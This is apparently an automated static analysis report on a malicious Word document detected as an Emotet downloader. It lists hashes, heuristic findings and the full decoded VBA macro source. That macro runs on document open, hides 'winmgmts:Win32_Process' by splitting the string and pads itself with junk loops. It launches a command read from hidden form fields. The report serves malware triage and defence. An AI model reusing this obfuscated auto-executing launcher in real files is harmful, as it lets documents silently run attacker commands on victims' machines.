Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4596778d372f74ec…

MALICIOUS

Office (OLE)

Size: 165.6 KB
Created: 2019-12-11 13:09:00
Authoring application: Microsoft Office Word
First seen: 2021-02-18
MD5: 2f5288c981be4fc8d7a8bfc6dd4f17ff
SHA-1: 0d2a971e4881bc6d04cc40882cd24a153b779caa
SHA-256: 4596778d372f74ec3886ee01245edde90f3d44e74342daf19074b4b8ceb56848
Risk score: 292

Heuristics (9)

  • ClamAV: Doc.Downloader.Emotet-7445950-0 [critical, CLAMAV_DETECTION]
    ClamAV detected this file as malware: Doc.Downloader.Emotet-7445950-0
  • VBA macros detected [medium, OLE_VBA_MACROS; 5 related findings]
    Document contains VBA macro code
  • VBA WMI Win32_Process launcher [critical, OLE_VBA_WMI_PROCESS_CREATE]
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
    Matched line in script:
    Set Toneavbh = CreateObject(Jzkbsnjupxfbo)
  • Dangerous API name reassembled from split string literals [critical, OLE_VBA_SPLIT_KEYWORD_OBFUSCATION]
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
    Matched line in script:
    Set Toneavbh = CreateObject(Jzkbsnjupxfbo)
  • CreateObject call [high, OLE_VBA_CREATEOBJ]
    CreateObject call
    Matched line in script:
    Set Toneavbh = CreateObject(Jzkbsnjupxfbo)
  • VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Document_Open macro [low, OLE_VBA_DOCOPEN]
    Document_Open macro
    Matched line in script:
    Private Sub Document_open()
  • Suspicious extracted artifact [info, EXTRACTED_FILE_STATIC_TRIAGE]
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info, EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 7753 bytes
SHA-256: 8beca7cafa87211b5c5bc173f3309c952810099a32b155a0aa6085e417631f5a

Detection:
ClamAV: No threats found
Obfuscation or payload: likely
190 of 281 identifiers look randomly generated (e.g. 'Bwkhgfbhpexid'), consistent with name-mangling obfuscation.

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "Tnfihhkold"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "Nxzzxecraqe, 0, 0, MSForms, TextBox"
Private Sub Document_open()
   For Lonlcahnwu = Efabmbhyrqa To 0
         Olkrqtnlucwt = (13 - Atn(51) - (44 + Round(41) * Pvopmsbezldo / CInt(1)))
    Select Case Etvorrnow
      Case Bzejddigj
         Dbndsklz = CLng(Gigbhibo)
         Yrjltxvw = Oct(Hdmaqtaozddx)
      Case Uqxivvgr
         Fmscjvoorsud = Kohnpaxaj
         Cznbmopyvvd = Int(29)
   End Select
Next
   For Irlztgxwl = Hshuombaatkvb To 0
         Rbbyudhvd = (13 - Atn(51) - (44 + Round(41) * Vmjwhzpv / CInt(1)))
    Select Case Btwmmksmyvkk
      Case Wvnhuzwejnr
         Emkgfkmpiel = CLng(Pifppkyvzmmh)
         Vxjjvyuo = Oct(Pezbyoqbzck)
      Case Txgpuezyzfgqs
         Pjxahralkxwl = Iythyqlpjz
         Pqztkgqv = Int(29)
   End Select
Next
   For Xajblukldn = Enqalmyplts To 0
         Bedsjwydei = (13 - Atn(51) - (44 + Round(41) * Dyftuflmcsz / CInt(1)))
    Select Case Rynryehpp
      Case Gstqrjafxkh
         Wrnhhjifrksx = CLng(Felbooqmbl)
         Ssuoxjkuvhqzh = Oct(Jphbtfxv)
      Case Jtzcjpcnlq
         Dninrqxomt = Gxukbqvwubo
         Smsnmwpkxl = Int(29)
   End Select
Next
Gcmadomyup
End Sub

Attribute VB_Name = "Bmbppnxuf"
Attribute VB_Base = "0{7A11953C-AA0C-4E87-9177-77DE18B9B140}{C9A7DE2F-4655-41D6-8EAE-1D5AD8262154}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Tdyszmnvdid"
Function Gmgupsfx()
   For Eifzwznd = Rsnniyag To 0
         Kabvjiowxiw = (13 - Atn(51) - (44 + Round(41) * Mxjeavsujwsiy / CInt(1)))
    Select Case Mjztznsegjqo
      Case Fuheuapyual
         Adjnlcvknidnk = CLng(Cujhhddcldde)
         Pzierrbxwfl = Oct(Sldrjgwvz)
      Case Nsxbxjhy
         Xjvjscseyewrw = Hmuxgrpieqz
         Amxmwjuciiqed = Int(29)
   End Select
Next
Eqsgrburihqb = Tnfihhkold.Nxzzxecraqe
   For Vxkidmgpgwroy = Tvlrsvaecysxz To 0
         Wirsjaqzs = (13 - Atn(51) - (44 + Round(41) * Edlrrvntet / CInt(1)))
    Select Case Cbvthjkohy
      Case Jwggydvs
         Rxtlhxjfm = CLng(Woqohipiw)
         Ekiuoguby = Oct(Vjxawbnfb)
      Case Tmhpsrugkk
         Sidnickkpk = Grgmnuqcturv
         Odhsmurxfrtoe = Int(29)
   End Select
Next
Kmmppwlxukiud = Eqsgrburihqb + Bmbppnxuf.Desznstht + Bmbppnxuf.Lmdujlerr + Bmbppnxuf.Vuepnmxui
   For Cxkdeohnwzavb = Lqyvkhyt To 0
         Hseizovtz = (13 - Atn(51) - (44 + Round(41) * Bwkhgfbhpexid / CInt(1)))
    Select Case Bttqddjx
      Case Dexkfbbsekuoo
         Wmlbkkbr = CLng(Bajdvrynld)
         Wkdvpzhk = Oct(Ppgrywmlc)
      Case Ydbsoisv
         Aasqayou = Kywktwetba
         Ocyhbdbq = Int(29)
   End Select
Next
Unfitkxdgdkb = Kmmppwlxukiud + Bmbppnxuf.Atxilvqeasjdz + Bmbppnxuf.Mpwefpspspmiy.ControlTipText
   For Slgjxfcxtecj = Bpklcqlnpkzl To 0
         Qgubsqlp = (13 - Atn(51) - (44 + Round(41) * Sdspsqrahlo / CInt(1)))
    Select Case Lypgewvjm
      Case Gnkaqcfmiwtzx
         Ztzdbpjyiddk = CLng(Kefluifgqjfg)
         Msyrkjwckjqix = Oct(Wnsysyrn)
      Case Npscqyvm
         Qelzxwiuwu = Qetvnhkaue
         Xueztlvvndl = Int(29)
   End Select
Next
Gmgupsfx = Psirofzor + Unfitkxdgdkb + Psirofzor
   For Eofgldaguurl = Xkaffsctfh To 0
         Pvvfgjjecnkab = (13 - Atn(51) - (44 + Round(41) * Rkfqukheapqo / CInt(1)))
    Select Case Liynmnelooh
      Case Hjzadlzkizq
         Iruqpvaoqem = CLng(Gofvrjsvzub)
         Djfcjhpxfnr = Oct(Lbaqennneleni)
      Case Uixtacsri
         Exsbboxsxrui = Czyyapbzidw
         Xwtjscjjpvcjq = Int(29)
   End Select
Next
End Function
Function Gcmadomyup()
   For Drzmxzpijtkl = Hpmubkld To 0
         Funwdnqaqfq = (13 - Atn(51) - (44 + Round(41) * Abyqqqpe / CInt(1)))
    Select Case Guhphcghz
      Case Hcltfvcjva
         Mmtduvmrlvohb = CLng(Ixjyqyusynwkv)
         Oftxvdozmmnt = Oct(Odrjxullcv)
      Case Tvqxkrergjne
         Uyxldfxhkjfa = Jdcyycksjobv
         Eeqnjcamo = Int(29)
   End Select
Next
Jzkbsnjupxfbo = QWE + "w" + "i" + "nmg" + "mts:Wi" + "n32" + "_P" + "roc" + "ess"
   For Jfdtyjfvaeoc = Zdgnmcqgwffk To 0
         Dpkixvrnucm = (13 - Atn(51) - (44 + Round(41) * Oalyqzrtchf / CInt(1)))
    Select Case Bdjynorsr
      Case Ffseljeaincg
         Plbtahfvr = CLng(Evoynxwpssk)
         Itdefszwyry = Oct(Yqdoknyqhnp)
      Case Qfrroeenlhea
         Trfeqvwygleiw = Afnckbufhcuyc
         Znuofycjzh = Int(29)
   End Select
Next
Set Toneavbh = CreateObject(Jzkbsnjupxfbo)
   For Pebysvkuo = Icugxemgsq To 0
         Mvbebzdtn = (13 - Atn(51) - (44 + Round(41) * Mputgyhsqrrlm / CInt(1)))
    Select Case Gaxpqrmxo
      Case Rjukrxncirc
         Hlxmovjpx = CLng(Cwyehzrgqqhy)
         Atxjyneqr = Oct(Uzjttbumc)
      Case Zjvjawtpamag
         Mgyjomfq = Ahmxpnmvxgt
         Pnhwbhstswr = Int(29)
   End Select
Next
Rkkopnwmumv = Jzkbsnjupxfbo + "ST" + WE + "ART" + "U"
   For Caiqdnnfxw = Sfaavgkas To 0
         Isuabrbymqp = (13 - Atn(51) - (44 + Round(41) * Zpgmqiekf / CInt(1)))
    Select Case Pqxljnttxma
      Case Nmnwyxqcut
         Zxkjadcsg = CLng(Uppzwwmuyr)
         Dvimhklvwwfjp = Oct(Wixfdcbtgi)
      Case Ghycocygosrv
         Poykfkompmbm = Ccbdjrfnytrhr
         Ercximnuwdnf = Int(29)
   End Select
Next
Aepkxfotdf = Rkkopnwmumv + Tnfihhkold.Nxzzxecraqe
   For Rbubsipuqbaz = Coadndte To 0
         Qguiyugfp = (13 - Atn(51) - (44 + Round(41) * Junlwrjwcyd / CInt(1)))
    Select Case Vehdeyxn
      Case Lmohvvuvklq
         Nrrlkixhncqm = CLng(Dbrzahgczi)
         Ahdsrnckulm = Oct(Fdfxjxuajqu)
      Case Qlmkrjbwhq
         Ldkjsroemvdb = Kpmqqiyfxqy
         Dkqxnadyukrq = Int(29)
   End Select
Next
Set Gcmadomyup = CreateObject((Aepkxfotdf))
   For Dggworcvuzbnq = Ioceoabivpt To 0
         Lvukfffun = (13 - Atn(51) - (44 + Round(41) * Gqpijhuxzqk / CInt(1)))
    Select Case Zwybxlhubwjzf
      Case Klwuqnyyks
         Uwqpaxxlihd = CLng(Qveufjeq)
         Ntqgiaynjy = Oct(Xlhjbheach)
      Case Zstdfjuxjkcv
         Pljuuyeextn = Xmljguyhq
         Iadadnimzlst = Int(29)
   End Select
Next
Gcmadomyup.XSize = Empty * Empty
   For Juleqdzobsl = Otoybmifmdp To 0
         Lxqtwmqzbkgm = (13 - Atn(51) - (44 + Round(41) * Erzeresxbaqul / CInt(1)))
    Select Case Xrvmwrbyhw
      Case Rmjhlope
         Zxmcovpdbb = CLng(Dtkzqectsit)
         Kstfgvlx = Oct(Yaudfieuxccj)
      Case Lykcturejbedw
         Forsbmzwbwlno = Ybbwuhki
         Atqsycmhyrnl = Int(29)
   End Select
Next
Gcmadomyup.YSize = Empty * Empty
   For Mbfheouzvfgv = Kjfkycmzkb To 0
         Gzjiblzsx = (13 - Atn(51) - (44 + Round(41) * Xscyosodx / CInt(1)))
    Select Case Fucrpehnr
      Case Zhvqmeuw
         Mbhswexgvxg = CLng(Uofjvulk)
         Usucxfji = Oct(Ptsvztzjgvg)
      Case Fbbhuzblf
         Nzcbaalpfdmbw = Cucdlwxmob
         Pizdkntharyjf = Int(29)
   End Select
Next
Do While Toneavbh.Create(Null & Gmgupsfx, Racxlvln, Gcmadomyup)
Loop
   For Fttklwhyoto = Geoohdzhedbw To 0
         Mardunxwxt = (13 - Atn(51) - (44 + Round(41) * Eelbkdypxn / CInt(1)))
    Select Case Spwgaprodmvyw
      Case Jxjhvwzzvvdt
         Rmyrskfrqvhcd = CLng(Ineujpsnfnc)
         Akxwsqlawhd = Oct(Rgnzstthmiy)
      Case Izzsdqqprgy
         Ntqmfbntxm = Vizhncyxd
         Bdempzaapp = Int(29)
   End Select
Next
End Function